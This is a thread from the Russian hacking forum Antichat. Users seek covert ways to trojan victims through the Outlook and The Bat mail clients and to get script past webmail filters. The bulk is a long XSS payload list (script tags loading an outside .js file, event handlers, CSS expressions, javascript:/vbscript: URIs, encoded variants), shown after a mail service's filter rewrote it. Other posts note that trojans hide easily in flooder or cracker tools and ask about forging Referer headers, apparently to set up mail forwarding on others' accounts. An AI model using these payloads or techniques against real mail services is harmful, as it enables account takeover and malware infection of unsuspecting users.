ANTICHAT — форум по информационной безопасности, OSINT и технологиям

рассказать что?

__________________
Фреймворк для спамера :(
Услуги программирования

если ты знаешь какойнибудь способ который кто применил 3 года назад так ты его сюда выложи

имею ввиду расскажи незаметные способы протроянить через аутлук или бэт

читай внимательнее. троян.
если *.exe не палит антивирь, не факт то, что это не троян. Трояны могут быть в программе, которой ты сам разрешишь доступ в веб, например какой нить мэйл флудер или чат-крякер. спрятать его труда не состовляет.

__________________
Фреймворк для спамера :(
Услуги программирования

а JaVaScRiPt убрали, вчера работало а сегодня нет уже.


JazzzSummerMan ты знаешь альтернативу?

я внимательно читаю
Какая разница палится или нет прога антивирусом, как они работают и тд. Это EXE. В новых версиях Бэт вообще нельзя её открыть из самого клиента без предварительного сохранения на диске. И где здесь то что ты назвал "подцепить троян и не заметить"?
Думал что у тебя есть способы обхода ограничений в потовых клиентах.

Гоблен вот тебе программа от LittleLamer для тестирования почты на XSS, скачай её, сразу разберешься что к чему, и мне кажется что ты сразу найдешь кучу альтернатив

http://forum.antichat.ru/attachment.php?attachmentid=71

ну ты сам хоть знаешь альтернативу?
а little lamer молодец набрал много вариантов тока зачем там програмка если и так все это можно послать?

и вот что получается:

<font face="Verdana" size=3 color=maroon>XSS</font><font face="Verdana" size=2 color=green> security tester v1.1</font><br>
<xscript><!-- alert(1) --></xscript>
<xscript src=http://xsstest.narod.ru/2.js><!-- --></xscript>
<xbody filtered-onLoad=alert(2)>
<xbody filtered-onlOaD=alert(3)>

<image src=http://xsstest.narod.ru/1.jpg filtered-onload=alert(5)>
<image src=http://xsstest.narod.ru/1.jpg filtered-onlOaD=alert(6)>
<image src=xjavascript:alert(7)>
<image src="" filtered-onerror=alert(8)>
<image src='' filtered-onerror=alert(9)>
<img src="" filtered-onerror=alert(10)>
<img src='' filtered-onerror=alert(11)>
<xembed src=xjavascript:alert(12);this.avi>
<xembed src=xjavascript:alert(13);this.wav>
<img src=http://jstest.narod.ru/1.jpg filtered-onload=alert(14)>
<img src=http://jstest.narod.ru/1.jpg filtered-onlOaD=alert(15)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(17))>
<span xstyle=background:url(xjavascript:alert(18))></span>
<hr xstyle=top:expression(alert(19))>
<span xstyle=top:expression(alert(20))></span>
<span sss="alert(21);this.sss=null" xstyle=top:expression(eval(this.sss));></span>
<span sss='alert(22);this.sss=null' xstyle=top:expression(eval(this.sss));></span>
<span sss=alert(23);this.sss=null xstyle=top:expression(eval(this.sss));></span>
<hr sss="alert(24);this.sss=null" xstyle=top:expression(eval(this.sss));>
<hr sss='alert(25);this.sss=null' xstyle=top:expression(eval(this.sss));>
<hr sss=alert(26);this.sss=null xstyle=top:expression(eval(this.sss));>
<xstyle type="text/css"><!-- @import url(javascript:alert(27)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(28)></xobject>
<xiframe src=xjavascript:alert(29)>
<a href=xjavascript:alert(30) target="_blank">click me</a>

<image src=xvbscript:alert(32)>
<xembed src=xvbscript:alert(33);this.avi>
<xembed src=xvbscript:alert(34);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xvbscript:alert(36))>
<span xstyle=background:url(xvbscript:alert(37))></span>
<xstyle type="text/css"><!-- @import url(vbscript:alert(38)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xvbscript:alert(39)></xobject>
<xiframe src=xvbscript:alert(40)>
<a href=xvbscript:alert(41) target="_blank">click me</a>

<image src=xjavascript:alert(43)>
<xembed src=xjavascript:alert(44);this.avi>
<xembed src=xjavascript:alert(45);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(47))>
<span xstyle=background:url(xjavascript:alert(48))></span>
<xstyle type="text/css"><!-- @import url(&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert(49)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(50)></xobject>
<xiframe src=xjavascript:alert(51)>
<a href=xjavascript:alert(52) target="_blank">click me</a>

<image src=xjavascript:alert(54)>
<xembed src=xjavascript:alert(55);this.avi>
<xembed src=xjavascript:alert(56);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(58))>
<span xstyle=background:url(xjavascript:alert(59))></span>
<xstyle type="text/css"><!-- @import url(javascript&#9:alert(60)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(61)></xobject>
<xiframe src=xjavascript:alert(62)>
<a href=xjavascript:alert(63) target="_blank">click me</a>

<image src=xjavascript:alert(65)>
<xembed src=xjavascript:alert(66);this.avi>
<xembed src=xjavascript:alert(67);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(69))>
<span xstyle=background:url(xjavascript:alert(70))></span>
<xstyle type="text/css"><!-- @import url(javascript&#10:alert(71)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(72)></xobject>
<xiframe src=xjavascript:alert(73)>
<a href=xjavascript:alert(74) target="_blank">click me</a>

<image src=xjavascript:alert(76)>
<xembed src=xjavascript:alert(77);this.avi>
<xembed src=xjavascript:alert(78);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(80))>
<span xstyle=background:url(xjavascript:alert(81))></span>
<xstyle type="text/css"><!-- @import url(javascript&#13:alert(82)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(83)></xobject>
<xiframe src=xjavascript:alert(84)>
<a href=xjavascript:alert(85) target="_blank">click me</a>

<image src=xjavascript:alert(87)>
<xembed src=xjavascript:alert(88);this.avi>
<xembed src=xjavascript:alert(89);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(91))>
<span xstyle=background:url(xjavascript:alert(92))></span>
<xstyle type="text/css"><!-- @import url(javascript :alert(93)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(94)></xobject>
<xiframe src=xjavascript:alert(95)>
<a href=xjavascript:alert(96) target="_blank">click me</a>



<image src=xjavascript:alert(98)>

<xembed src=xjavascript:alert(99);this.avi>

<xembed src=xjavascript:alert(100);this.wav>

<img src="http://img.mail.ru/mail/ru/images/dumb.gif">

<hr xstyle=background:url(xjavascript:alert(102))>

<span xstyle=background:url(xjavascript:alert(103))></span>
<xstyle type="text/css"><!-- @import url(javascript
:alert(104)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
<param name=url value=xjavascript:alert(105)></xobject>


<xiframe src=javascript <a href=xjavascript:alert(106)>click me</a>
<image src="" filtered-onERror=alert(107)>
<image src='' filtered-onERror=alert(108)>
<img src="" filtered-onERror=alert(109)>
<img src='' filtered-onERror=alert(110)>
<image src=""filtered-onerror=alert(111)>
<image src=''filtered-onerror=alert(112)>
<img src=""filtered-onerror=alert(113)>
<img src=''filtered-onerror=alert(114)>
<image src=""filtered-onErRor=alert(115)>
<image src=''filtered-onErRor=alert(116)>
<img src=""filtered-onErRor=alert(117)>
<img src=''filtered-onErRor=alert(118)>
<image src="a"filtered-onError=alert(119)>
<image src='a'filtered-onError=alert(120)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onError=alert(121)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onError=alert(122)>
<image src="a"filtered-onErRor=alert(123)>
<image src='a'filtered-onERror=alert(124)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(125)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(126)>
<image src="a" filtered-onErRor=alert(127)>
<image src='a' filtered-onErRor=alert(128)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif" filtered-onErRor=alert(129)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif" filtered-onErRor=alert(130)>
<image src="a"filtered-onerror=alert(131)>
<image src='a'filtered-onerror=alert(132)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onerror=alert(133)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onerror=alert(134)>
<image src="a"filtered-onErRor=alert(135)>
<image src='a'filtered-onErRor=alert(136)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(137)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(138)>


так что эти приколы уже непойдут.

да и ты знаешь можно ли как нибудь технично яваскриптом вставить левый реферер? я нет и приходится делать это через цги. скажи если знаешь.

Не знаю, потому что не собирался искать без надобности
Можно и так посылать, но во-первых СМТП-шник готовый есть, который в хтмл шлет), а во-вторых процесс автоматизируется, для всяких почт можно сразу использовать. и со своими настройками.

Ты же понимаешь принцип обхода фильтров. Так найди свои приколы, тема не новая, кто за тебя будет рутиной заниматься хм..

явоскриптом никак нельзя имхо , реф на уровне заголовков все-таки.
Тебе это нужно чтобы настроить пересылку в почте, верно? Есть кое-какие соображения. поделюсь позже, если получится